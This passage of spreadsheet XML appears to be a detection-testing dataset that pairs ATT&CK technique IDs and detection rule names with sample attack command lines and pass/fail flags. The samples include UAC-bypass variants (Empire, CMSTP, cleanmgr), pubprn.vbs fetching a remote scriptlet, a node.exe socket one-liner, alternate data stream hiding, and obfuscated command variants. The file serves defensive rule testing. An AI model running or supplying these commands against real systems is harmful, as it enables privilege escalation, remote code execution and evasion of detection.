          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C3525" s="44" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D3525" s="44" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E3525" s="44" t="inlineStr">
        <is>
          <t>powershell.exe  -NoP  -NonI  -w  Hidden  -c  $x=$((gp  HKCU:Software\Microsoft\Windows Update).Update)</t>
        </is>
      </c>
      <c r="F3525" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3525" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3525" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3525" s="44" t="n"/>
      <c r="J3525" s="44" t="n"/>
      <c r="K3525" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3526" ht="15.75" customHeight="1" s="42">
      <c r="A3526" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3526" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C3526" s="44" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D3526" s="44" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E3526" s="44" t="inlineStr">
        <is>
          <t>powershell.exe	-NoP	-NonI	-w	Hidden	-c	$x=$((gp	HKCU:Software\Microsoft\Windows Update).Update)</t>
        </is>
      </c>
      <c r="F3526" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3526" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3526" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3526" s="44" t="n"/>
      <c r="J3526" s="44" t="n"/>
      <c r="K3526" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3527" ht="15.75" customHeight="1" s="42">
      <c r="A3527" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3527" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C3527" s="44" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D3527" s="44" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E3527" s="44" t="inlineStr">
        <is>
          <t>powershell.exe "-NoP" "-NonI" "-w" "Hidden" "-c" "$x=$((gp HKCU:Software\Microsoft\Windows Update).Update)"</t>
        </is>
      </c>
      <c r="F3527" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3527" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3527" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3527" s="44" t="n"/>
      <c r="J3527" s="44" t="n"/>
      <c r="K3527" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3528" ht="15.75" customHeight="1" s="42">
      <c r="A3528" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3528" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C3528" s="44" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D3528" s="44" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E3528" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NonI -NoP -w Hidden -c "$x=$((gp 'HKCU:Software\Microsoft\Windows Update').Update)"</t>
        </is>
      </c>
      <c r="F3528" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3528" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3528" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3528" s="44" t="n"/>
      <c r="J3528" s="44" t="n"/>
      <c r="K3528" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3529" ht="15.75" customHeight="1" s="42">
      <c r="A3529" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3529" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cleanmgr</t>
        </is>
      </c>
      <c r="C3529" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using Disk Cleanup</t>
        </is>
      </c>
      <c r="D3529" s="44" t="inlineStr">
        <is>
          <t>b697e69c-746f-4a86-9f59-7bfff8eab881</t>
        </is>
      </c>
      <c r="E3529" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\cleanmgr.exe /autoclean /d C:</t>
        </is>
      </c>
      <c r="F3529" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3529" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3529" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3529" s="44" t="n"/>
      <c r="J3529" s="44" t="n"/>
      <c r="K3529" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3530" ht="15.75" customHeight="1" s="42">
      <c r="A3530" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3530" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cleanmgr</t>
        </is>
      </c>
      <c r="C3530" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using Disk Cleanup</t>
        </is>
      </c>
      <c r="D3530" s="44" t="inlineStr">
        <is>
          <t>b697e69c-746f-4a86-9f59-7bfff8eab881</t>
        </is>
      </c>
      <c r="E3530" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\cleanmgr.exe /autoclean /d c:</t>
        </is>
      </c>
      <c r="F3530" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3530" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3530" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3530" s="44" t="n"/>
      <c r="J3530" s="44" t="n"/>
      <c r="K3530" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3531" ht="15.75" customHeight="1" s="42">
      <c r="A3531" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3531" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cleanmgr</t>
        </is>
      </c>
      <c r="C3531" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using Disk Cleanup</t>
        </is>
      </c>
      <c r="D3531" s="44" t="inlineStr">
        <is>
          <t>b697e69c-746f-4a86-9f59-7bfff8eab881</t>
        </is>
      </c>
      <c r="E3531" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\cleanmgr.exe /autoclean /d C:\</t>
        </is>
      </c>
      <c r="F3531" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3531" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3531" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3531" s="44" t="n"/>
      <c r="J3531" s="44" t="n"/>
      <c r="K3531" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3532" ht="15.75" customHeight="1" s="42">
      <c r="A3532" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3532" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C3532" s="44" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D3532" s="44" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E3532" s="44" t="inlineStr">
        <is>
          <t>cmstp.exe "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf"</t>
        </is>
      </c>
      <c r="F3532" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3532" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3532" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3532" s="44" t="n"/>
      <c r="J3532" s="44" t="n"/>
      <c r="K3532" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3533" ht="15.75" customHeight="1" s="42">
      <c r="A3533" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3533" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_msconfig_gui</t>
        </is>
      </c>
      <c r="C3533" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using MSConfig Token Modification - Process</t>
        </is>
      </c>
      <c r="D3533" s="44" t="inlineStr">
        <is>
          <t>ad92e3f9-7eb6-460e-96b1-582b0ccbb980</t>
        </is>
      </c>
      <c r="E3533" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\msconfig.exe -5</t>
        </is>
      </c>
      <c r="F3533" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3533" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3533" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3533" s="44" t="n"/>
      <c r="J3533" s="44" t="n"/>
      <c r="K3533" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3534" ht="15.75" customHeight="1" s="42">
      <c r="A3534" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3534" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_ntfs_reparse_point</t>
        </is>
      </c>
      <c r="C3534" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using NTFS Reparse Point - Process</t>
        </is>
      </c>
      <c r="D3534" s="44" t="inlineStr">
        <is>
          <t>39ed3c80-e6a1-431b-9df3-911ac53d08a7</t>
        </is>
      </c>
      <c r="E3534" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wusa.exe /quiet C:\Users\Public\..\AppData\Local\Temp\update.msu</t>
        </is>
      </c>
      <c r="F3534" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3534" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3534" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3534" s="44" t="n"/>
      <c r="J3534" s="44" t="n"/>
      <c r="K3534" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3535" ht="15.75" customHeight="1" s="42">
      <c r="A3535" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3535" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C3535" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D3535" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E3535" s="44" t="inlineStr">
        <is>
          <t>winget install -m"C:\Temp\test.yaml"</t>
        </is>
      </c>
      <c r="F3535" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3535" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3535" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3535" s="44" t="n"/>
      <c r="J3535" s="44" t="n"/>
      <c r="K3535" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3536" ht="15.75" customHeight="1" s="42">
      <c r="A3536" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3536" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C3536" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3536" s="44" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E3536" s="44" t="inlineStr">
        <is>
          <t>hh.exe -decompile C:\Users\thaim\AppData\Local\Temp "C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.ch""m"</t>
        </is>
      </c>
      <c r="F3536" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3536" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3536" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3536" s="44" t="n"/>
      <c r="J3536" s="44" t="n"/>
      <c r="K3536" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3537" ht="15.75" customHeight="1" s="42">
      <c r="A3537" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3537" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C3537" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3537" s="44" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E3537" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c hh.exe -decompile C:\Users\thaim\AppData\Local\Temp "C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.ch^m"</t>
        </is>
      </c>
      <c r="F3537" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3537" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3537" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3537" s="44" t="n"/>
      <c r="J3537" s="44" t="n"/>
      <c r="K3537" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3538" ht="15.75" customHeight="1" s="42">
      <c r="A3538" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3538" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_onenote_embedded_script_execution</t>
        </is>
      </c>
      <c r="C3538" s="44" t="inlineStr">
        <is>
          <t>OneNote.EXE Execution of Malicious Embedded Scripts</t>
        </is>
      </c>
      <c r="D3538" s="44" t="inlineStr">
        <is>
          <t>84b1706c-932a-44c4-ae28-892b28a25b94</t>
        </is>
      </c>
      <c r="E3538" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -File "C:\Users\Public\OneNote\exported\\script.ps1"</t>
        </is>
      </c>
      <c r="F3538" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3538" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3538" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3538" s="44" t="n"/>
      <c r="J3538" s="44" t="n"/>
      <c r="K3538" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3539" ht="15.75" customHeight="1" s="42">
      <c r="A3539" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3539" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_onenote_embedded_script_execution</t>
        </is>
      </c>
      <c r="C3539" s="44" t="inlineStr">
        <is>
          <t>OneNote.EXE Execution of Malicious Embedded Scripts</t>
        </is>
      </c>
      <c r="D3539" s="44" t="inlineStr">
        <is>
          <t>84b1706c-932a-44c4-ae28-892b28a25b94</t>
        </is>
      </c>
      <c r="E3539" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -File "C:/Users/Public/OneNote/exported/script.ps1"</t>
        </is>
      </c>
      <c r="F3539" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3539" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3539" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3539" s="44" t="n"/>
      <c r="J3539" s="44" t="n"/>
      <c r="K3539" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3540" ht="15.75" customHeight="1" s="42">
      <c r="A3540" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3540" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_onenote_embedded_script_execution</t>
        </is>
      </c>
      <c r="C3540" s="44" t="inlineStr">
        <is>
          <t>OneNote.EXE Execution of Malicious Embedded Scripts</t>
        </is>
      </c>
      <c r="D3540" s="44" t="inlineStr">
        <is>
          <t>84b1706c-932a-44c4-ae28-892b28a25b94</t>
        </is>
      </c>
      <c r="E3540" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -File "\\?\C:\Users\Public\OneNote\exported\script.ps1"</t>
        </is>
      </c>
      <c r="F3540" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3540" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3540" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3540" s="44" t="n"/>
      <c r="J3540" s="44" t="n"/>
      <c r="K3540" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3541" ht="15.75" customHeight="1" s="42">
      <c r="A3541" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3541" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_onenote_embedded_script_execution</t>
        </is>
      </c>
      <c r="C3541" s="44" t="inlineStr">
        <is>
          <t>OneNote.EXE Execution of Malicious Embedded Scripts</t>
        </is>
      </c>
      <c r="D3541" s="44" t="inlineStr">
        <is>
          <t>84b1706c-932a-44c4-ae28-892b28a25b94</t>
        </is>
      </c>
      <c r="E3541" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -File "C:\Users\Public\OneNote\exported\.\script.ps1"</t>
        </is>
      </c>
      <c r="F3541" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3541" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3541" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3541" s="44" t="n"/>
      <c r="J3541" s="44" t="n"/>
      <c r="K3541" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3542" ht="15.75" customHeight="1" s="42">
      <c r="A3542" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3542" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_node_abuse</t>
        </is>
      </c>
      <c r="C3542" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Code Execution Via Node.EXE</t>
        </is>
      </c>
      <c r="D3542" s="44" t="inlineStr">
        <is>
          <t>6640f31c-01ad-49b5-beb5-83498a5cd8bd</t>
        </is>
      </c>
      <c r="E3542" s="44" t="inlineStr">
        <is>
          <t>node.exe "-e" "const cp = require('child_process'); const n = require('net'); const s = new n.Socket(); s.connect(4444, '127.0.0.1'); cp.exec('whoami');"</t>
        </is>
      </c>
      <c r="F3542" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3542" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3542" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3542" s="44" t="n"/>
      <c r="J3542" s="44" t="n"/>
      <c r="K3542" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3543" ht="15.75" customHeight="1" s="42">
      <c r="A3543" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3543" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_alternate_data_streams</t>
        </is>
      </c>
      <c r="C3543" s="44" t="inlineStr">
        <is>
          <t>Execute From Alternate Data Streams</t>
        </is>
      </c>
      <c r="D3543" s="44" t="inlineStr">
        <is>
          <t>7f43c430-5001-4f8b-aaa9-c3b88f18fa5c</t>
        </is>
      </c>
      <c r="E3543" s="44" t="inlineStr">
        <is>
          <t>type C:\Temp\test.txt&gt;C:\Temp\host.txt:stream.txt</t>
        </is>
      </c>
      <c r="F3543" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3543" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3543" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3543" s="44" t="n"/>
      <c r="J3543" s="44" t="n"/>
      <c r="K3543" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3544" ht="15.75" customHeight="1" s="42">
      <c r="A3544" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3544" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_alternate_data_streams</t>
        </is>
      </c>
      <c r="C3544" s="44" t="inlineStr">
        <is>
          <t>Execute From Alternate Data Streams</t>
        </is>
      </c>
      <c r="D3544" s="44" t="inlineStr">
        <is>
          <t>7f43c430-5001-4f8b-aaa9-c3b88f18fa5c</t>
        </is>
      </c>
      <c r="E3544" s="44" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software\Test "C:\Temp\backup.log:hidden"</t>
        </is>
      </c>
      <c r="F3544" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3544" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3544" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3544" s="44" t="n"/>
      <c r="J3544" s="44" t="n"/>
      <c r="K3544" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3545" ht="15.75" customHeight="1" s="42">
      <c r="A3545" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3545" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hidden_dir_index_allocation</t>
        </is>
      </c>
      <c r="C3545" s="44" t="inlineStr">
        <is>
          <t>Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI</t>
        </is>
      </c>
      <c r="D3545" s="44" t="inlineStr">
        <is>
          <t>0900463c-b33b-49a8-be1d-552a3b553dae</t>
        </is>
      </c>
      <c r="E3545" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$p1='::$index_'; $p2='allocation'; New-Item -ItemType Directory -Path "$env:temp\...$.......$p1$p2""</t>
        </is>
      </c>
      <c r="F3545" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3545" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3545" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3545" s="44" t="n"/>
      <c r="J3545" s="44" t="n"/>
      <c r="K3545" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3546" ht="15.75" customHeight="1" s="42">
      <c r="A3546" s="44" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B3546" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_launch_vsdevshell</t>
        </is>
      </c>
      <c r="C3546" s="44" t="inlineStr">
        <is>
          <t>Launch-VsDevShell.PS1 Proxy Execution</t>
        </is>
      </c>
      <c r="D3546" s="44" t="inlineStr">
        <is>
          <t>45d3a03d-f441-458c-8883-df101a3bb146</t>
        </is>
      </c>
      <c r="E3546" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -File Launch-VsDevShell.ps1 -VsWherePath	"C:\Program Files (x86)\Microsoft Visual Studio\Installer\vswhere.exe"</t>
        </is>
      </c>
      <c r="F3546" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3546" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3546" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3546" s="44" t="n"/>
      <c r="J3546" s="44" t="n"/>
      <c r="K3546" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3547" ht="15.75" customHeight="1" s="42">
      <c r="A3547" s="44" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B3547" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_launch_vsdevshell</t>
        </is>
      </c>
      <c r="C3547" s="44" t="inlineStr">
        <is>
          <t>Launch-VsDevShell.PS1 Proxy Execution</t>
        </is>
      </c>
      <c r="D3547" s="44" t="inlineStr">
        <is>
          <t>45d3a03d-f441-458c-8883-df101a3bb146</t>
        </is>
      </c>
      <c r="E3547" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -File Launch-VsDevShell.ps1 "-VsWherePath" "C:\Program Files (x86)\Microsoft Visual Studio\Installer\vswhere.exe"</t>
        </is>
      </c>
      <c r="F3547" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3547" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3547" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3547" s="44" t="n"/>
      <c r="J3547" s="44" t="n"/>
      <c r="K3547" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3548" ht="15.75" customHeight="1" s="42">
      <c r="A3548" s="44" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B3548" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_launch_vsdevshell</t>
        </is>
      </c>
      <c r="C3548" s="44" t="inlineStr">
        <is>
          <t>Launch-VsDevShell.PS1 Proxy Execution</t>
        </is>
      </c>
      <c r="D3548" s="44" t="inlineStr">
        <is>
          <t>45d3a03d-f441-458c-8883-df101a3bb146</t>
        </is>
      </c>
      <c r="E3548" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -File Launch-Vs''DevShell.ps1 -VsWherePath "C:\Program Files (x86)\Microsoft Visual Studio\Installer\vswhere.exe"</t>
        </is>
      </c>
      <c r="F3548" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3548" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3548" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3548" s="44" t="n"/>
      <c r="J3548" s="44" t="n"/>
      <c r="K3548" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3549" ht="15.75" customHeight="1" s="42">
      <c r="A3549" s="44" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B3549" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pubprn</t>
        </is>
      </c>
      <c r="C3549" s="44" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution</t>
        </is>
      </c>
      <c r="D3549" s="44" t="inlineStr">
        <is>
          <t>1fb76ab8-fa60-4b01-bddd-71e89bf555da</t>
        </is>
      </c>
      <c r="E3549" s="44" t="inlineStr">
        <is>
          <t>cscript.exe /b "C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs" localhost "sc""ript:[https://example.com/test.sct](https://www.google.com/search?q=https://example.com/test.sct)"</t>
        </is>
      </c>
      <c r="F3549" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3549" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3549" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3549" s="44" t="n"/>
      <c r="J3549" s="44" t="n"/>
      <c r="K3549" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3550" ht="15.75" customHeight="1" s="42">
      <c r="A3550" s="44" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B3550" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pubprn</t>
        </is>
      </c>
      <c r="C3550" s="44" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution</t>
        </is>
      </c>
      <c r="D3550" s="44" t="inlineStr">
        <is>
          <t>1fb76ab8-fa60-4b01-bddd-71e89bf555da</t>
        </is>
      </c>
      <c r="E3550" s="44" t="inlineStr">
        <is>
          <t>cscript.exe /b C:/Windows/System32/Printing_Admin_Scripts/en-US/pubprn.vbs localhost "script:[https://example.com/test.sct](https://www.google.com/search?q=https://example.com/test.sct)"</t>
        </is>
      </c>
      <c r="F3550" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3550" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3550" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3550" s="44" t="n"/>
      <c r="J3550" s="44" t="n"/>
      <c r="K3550" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3551" ht="15.75" customHeight="1" s="42">
      <c r="A3551" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3551" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_loadassembly</t>
        </is>
      </c>
      <c r="C3551" s="44" t="inlineStr">
        <is>
          <t>Assembly Loading Via CL_LoadAssembly.ps1</t>
        </is>
      </c>
      <c r="D3551" s="44" t="inlineStr">
        <is>
          <t>c57872c7-614f-4d7f-a40d-b78c8df2d30d</t>
        </is>
      </c>
      <c r="E3551" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; {LoadAssemblyFromPath}"</t>
        </is>
      </c>
      <c r="F3551" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3551" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3551" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3551" s="44" t="n"/>
      <c r="J3551" s="44" t="n"/>
      <c r="K3551" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3552" ht="15.75" customHeight="1" s="42">
      <c r="A3552" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3552" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_loadassembly</t>
        </is>
      </c>
      <c r="C3552" s="44" t="inlineStr">
        <is>
          <t>Assembly Loading Via CL_LoadAssembly.ps1</t>
        </is>
      </c>
      <c r="D3552" s="44" t="inlineStr">
        <is>
          <t>c57872c7-614f-4d7f-a40d-b78c8df2d30d</t>
        </is>
      </c>
      <c r="E3552" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "LoadAssemblyFromPath;"</t>
        </is>
      </c>
      <c r="F3552" s="44" t="b">
        <v>1</v>
      </c>
